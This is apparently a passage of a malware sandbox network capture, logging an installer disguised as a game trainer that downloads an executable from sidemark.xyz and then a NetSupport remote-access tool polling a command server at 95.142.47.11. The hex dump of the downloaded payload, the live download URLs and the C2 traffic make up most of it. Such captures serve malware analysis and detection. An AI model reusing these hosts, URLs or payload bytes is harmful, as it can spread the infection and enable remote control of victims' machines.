                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WFGhYHhdnCx1b3TedMNxn7xsh2rV5gfZ0yaKDNMdkcFVnbX6Amwih2l2ZuniGERQxTjb1oqrbqzaoR6unTZqpkxmDihnqDqSd6l7P6%2B5k2N3M5XSsArM%2Bt9jANcFdtF7mo0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8314e5eecf76205d-IAD
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        Data Raw: 68 74 74 70 3a 2f 2f 73 69 64 65 6d 61 72 6b 2e 78 79 7a 2f 70 65 2f 62 75 69 6c 64 49 4e 2e 70 68 70 3f 73 75 62 3d 26 73 6f 75 72 63 65 3d 33 38 39 30 26 73 31 3d 34 37 36 37 30 31 30 30 26 74 69 74 6c 65 3d 63 6d 6c 32 5a 58 49 74 59 32 6c 30 65 53 31 79 61 58 5a 68 62 43 31 7a 61 47 39 33 5a 47 39 33 62 69 31 30 63 6d 46 70 62 6d 56 79 4c 54 45 31 4c 58 59 78 4c 54 67 74 4c 6d 56 34 5a 51 25 33 44 25 33 44 26 74 69 3d 31 37 30 31 38 36 39 35 38 31
                                                                                                                                                                                                                                                                        Data Ascii: http://sidemark.xyz/pe/buildIN.php?sub=&source=3890&s1=47670100&title=cml2ZXItY2l0eS1yaXZhbC1zaG93ZG93bi10cmFpbmVyLTE1LXYxLTgtLmV4ZQ%3D%3D&ti=1701869581
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:04.002224922 CET157OUTGET /pill.php HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        User-Agent: Inno Setup 6.2.2
                                                                                                                                                                                                                                                                        Host: sparksteam.site
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:05.014228106 CET651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:33:04 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                        Content-Length: 2
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cunHKBJ3wOj18ZSQHFAIKYJ120KGieVd9mqt8V7rGYAbrwADkjN8oy3bOfi%2F5q43XKwuJ3PKU3AQla5z3tI2uBrjDbPQ%2Bxqf93lGNGBCrXKFxqWFmagITCwpkSgDb1Cjlw8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8314e6044f21205d-IAD
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        Data Raw: 6f 6b
                                                                                                                                                                                                                                                                        Data Ascii: ok


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        1192.168.2.549706104.21.73.195805240C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmp
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:01.522250891 CET278OUTGET /pe/buildIN.php?sub=&source=3890&s1=47670100&title=cml2ZXItY2l0eS1yaXZhbC1zaG93ZG93bi10cmFpbmVyLTE1LXYxLTgtLmV4ZQ%3D%3D&ti=1701869581 HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        User-Agent: Inno Setup 6.2.2
                                                                                                                                                                                                                                                                        Host: sidemark.xyz
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.386810064 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:33:03 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/force-download
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/5.3.28
                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="65707801b8947_pe.exe"
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KBE8RoeuYz%2Fehhh%2BaZYbGWyko9TJZ1j92aVxMN30%2B5vA86leZHxhPv4cM2ywUaT%2FgoFnN64nhCd1Y9znKZd%2B8UTPKP9bvEzImdLX5sdWGZ0OVob5ix%2FLULeLCUNsDoQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8314e5f4cada576c-IAD
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        Data Raw: 37 64 30 62 0d 0a 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 18 f2 ec 63 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 52 0b 00 00 5e 01 00 00 00 00 00 ec 5e 0b 00 00 10 00 00 00 70 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 06 00 00 00 06 00 01 00 00 00 00 00 00 80 0d 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 40 0c 00 9a 00 00 00 00 20 0c 00 dc 0f 00 00 00 70 0c 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 22 0c 00 54 02 00 00 00 30 0c 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 39 0b 00 00 10 00 00 00 3a 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 88 16 00 00 00 50 0b 00 00 18 00 00 00 3e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 37 00 00 00 70 0b 00 00 38 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: 7d0bMZP@!L!This program must be run under Win32$7PELcR^^p@@@@ p`"T0.text9: `.itextP> `.data7p8
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.386840105 CET1340INData Raw: 56 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 e8 6d 00 00 00 b0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 dc 0f 00 00 00 20 0c 00 00 10 00 00 00 8e 0b
                                                                                                                                                                                                                                                                        Data Ascii: V@.bssm.idata @.didata0@.edata@@@.tlsP.rdata]`
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.386861086 CET1340INData Raw: 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 05 00 0b f4 ca 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65
                                                                                                                                                                                                                                                                        Data Ascii: 1@D2@D3D4@&op_Equality@@@Left@@Right|K&op_Inequality@@@Left@@Right|KEmpty@@|KCreate@@Data@BigEndian|KCreate@@
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.387182951 CET1340INData Raw: 00 fd ff 32 1f 40 00 4a 00 fe ff 5e 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 5c 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 5c 40 00 04 46 72 65 65 03 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: 2@J^@MTObject&\@Create@Self$\@Free@Self)|KDisposeOf@Self>\@InitInstance@Self@Instance/L]@CleanupInstance@
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.387346029 CET1340INData Raw: 6a 02 00 02 00 2b 00 b8 5d 40 00 0b 47 65 74 48 61 73 68 43 6f 64 65 03 00 9c 10 40 00 08 00 01 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 33 00 14 60 40 00 08 54 6f 53 74 72 69 6e 67 03 00 b8 12 40 00 08 00 02 08 88 1f 40 00 00 00 04 53 65
                                                                                                                                                                                                                                                                        Data Ascii: j+]@GetHashCode@@Self3`@ToString@@Self@@[`@SafeCallException(@@Self@ExceptObject@ExceptAddr1,`@AfterConstruction@Self10`
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.387485981 CET1340INData Raw: 5c 40 00 a4 5c 40 00 d8 5c 40 00 00 00 02 00 a6 22 40 00 44 00 f4 ff db 22 40 00 44 00 f4 ff 00 00 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 35 00 18 7c 4b 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 02 08 20 23 40 00 00 00 04 53 65 6c
                                                                                                                                                                                                                                                                        Data Ascii: \@\@\@"@D"@DHPPGENAttribute5|KCreate #@Self@ADataD\W@Create #@Self@AFlag@AData$#@HPPGENAttribute"@ @SystemT#@PMonitorT$@h#@
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.387619019 CET1340INData Raw: 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 6c 27 40 00 08 00 00 00 00 00 00 00 b0 26 40 00 f4 27 40 00 78 27 40 00 00 00 00 00 00 00 00 00 dc 28 40 00 f4 27 40 00 1b 28 40 00 00 00 00 00 39 28 40 00 10 00 00 00 10 17 40 00 b0 5d 40 00 b8
                                                                                                                                                                                                                                                                        Data Ascii: Fl'@&@'@x'@(@'@(@9(@@]@]@`@`@@@4`@(`@@\@\@@FRefCount!@\@K(@J|(@J(@KTInterfacedObject1@AfterConstruction
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.387692928 CET1340INData Raw: 02 00 00 11 40 00 08 00 00 00 02 09 56 44 69 73 70 61 74 63 68 02 00 28 13 40 00 08 00 00 00 02 06 56 45 72 72 6f 72 02 00 58 12 40 00 08 00 00 00 02 08 56 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64
                                                                                                                                                                                                                                                                        Data Ascii: @VDispatch(@VErrorX@VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@V
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.387768984 CET1340INData Raw: 74 02 00 34 29 40 00 0c 00 00 00 02 09 55 6e 69 74 4e 61 6d 65 73 02 00 02 00 00 00 00 a8 31 40 00 11 13 54 41 72 72 61 79 3c 53 79 73 74 65 6d 2e 42 79 74 65 3e 01 00 00 00 00 00 00 00 11 00 00 00 b4 10 40 00 06 53 79 73 74 65 6d b4 10 40 00 02
                                                                                                                                                                                                                                                                        Data Ascii: t4)@UnitNames1@TArray<System.Byte>@System@1@TArray<System.Char>L@SystemL@2@TArray<System.Integer>@System@T2@PLibModuleh2@l2@TLibModule
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.387866974 CET1340INData Raw: 00 8b c0 ff 25 80 23 4c 00 8b c0 ff 25 6c 23 4c 00 8b c0 ff 25 44 24 4c 00 8b c0 ff 25 14 23 4c 00 8b c0 ff 25 64 23 4c 00 8b c0 ff 25 20 23 4c 00 8b c0 ff 25 84 23 4c 00 8b c0 ff 25 40 23 4c 00 8b c0 ff 25 30 23 4c 00 8b c0 ff 25 d4 24 4c 00 8b
                                                                                                                                                                                                                                                                        Data Ascii: %#L%l#L%D$L%#L%d#L% #L%#L%@#L%0#L%$L%#L%D#L%,#L%#L%#L%x#L%"L%$L%$L%($L%#L%d$L%|$L%X$L%$L%T#Lh 0LYZ$PRQh0L@
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.387999058 CET1340INData Raw: 0f 83 67 ff ff ff c3 90 90 ba f0 ff ff ff 23 50 fc 81 fa 30 0b 00 00 72 12 e8 0f ff ff ff a1 ec ba 4b 00 ba f0 ff ff ff 23 50 fc 8b 0d f0 ba 4b 00 29 c8 01 ca eb b9 c3 90 53 56 8b d8 e8 8b ff ff ff 6a 04 68 00 10 00 00 68 f0 ff 13 00 6a 00 e8 54
                                                                                                                                                                                                                                                                        Data Ascii: g#P0rK#PK)SVjhhjTtNKKKJ+5K+K^[3K3^[=YKt?*=Ku!j3xKtj3


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        2192.168.2.54971951.142.119.24806024C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:18.352473974 CET172OUTGET /location/loca.asp HTTP/1.1
                                                                                                                                                                                                                                                                        Host: geo.netsupportsoftware.com
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:18.963184118 CET389INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                                        Content-Type: text/html; Charset=utf-8
                                                                                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Set-Cookie: ASPSESSIONIDASCAQTDA=AACDKNODMJHMEPAEJLPIDJLM; path=/
                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:33:18 GMT
                                                                                                                                                                                                                                                                        Content-Length: 16
                                                                                                                                                                                                                                                                        Data Raw: 33 38 2e 39 30 37 32 2c 2d 37 37 2e 30 33 36 39
                                                                                                                                                                                                                                                                        Data Ascii: 38.9072,-77.0369


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        3192.168.2.54971895.142.47.1112036024C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:18.378297091 CET270OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 95.142.47.11Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:18.591708899 CET269INHTTP/1.1 200 OKServer: NetSupport Gateway/1.3 (Windows NT)Content-Type: application/x-www-form-urlencodedContent-Length: 61Connection: Keep-AliveCMD=ENCDES=1DATA=g+${ \W&=@Q{w}oXxf
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:18.594446898 CET473OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 225Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=u2hr4]%y-=ID3Wi7?=@Ff&t[6raLqZD-'?}##rtr5=Ifp">0MQYz8?V{r?(+j}[e0=@L\#=J8e6Qz8A ]
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:18.808566093 CET360INHTTP/1.1 200 OKServer: NetSupport Gateway/1.3 (Windows NT)Content-Type: application/x-www-form-urlencodedContent-Length: 152Connection: Keep-AliveCMD=ENCDES=1DATA=u2hr \WhE=I=n~G}&[}X),,Dq,()4]%y-A9H=n :!b<DWiJCz:;<=J&$Rb'h[TjI
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:18.908165932 CET324OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 76Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=l3<(T{EVk9|||$(m$CZeN>j"Bml`
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:11.439142942 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:24.274035931 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:26.388926029 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:26.690031052 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:26.795017958 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:26.895029068 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:26.996088028 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:27.097031116 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:27.197016954 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:27.298074961 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:27.397988081 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:27.498547077 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:27.598927021 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:27.700120926 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:27.799945116 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:27.902318001 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:28.002963066 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:28.102981091 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:28.203917980 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:28.304975986 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:28.406130075 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:28.511954069 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:28.612948895 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:28.712990999 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:28.812930107 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:28.913989067 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
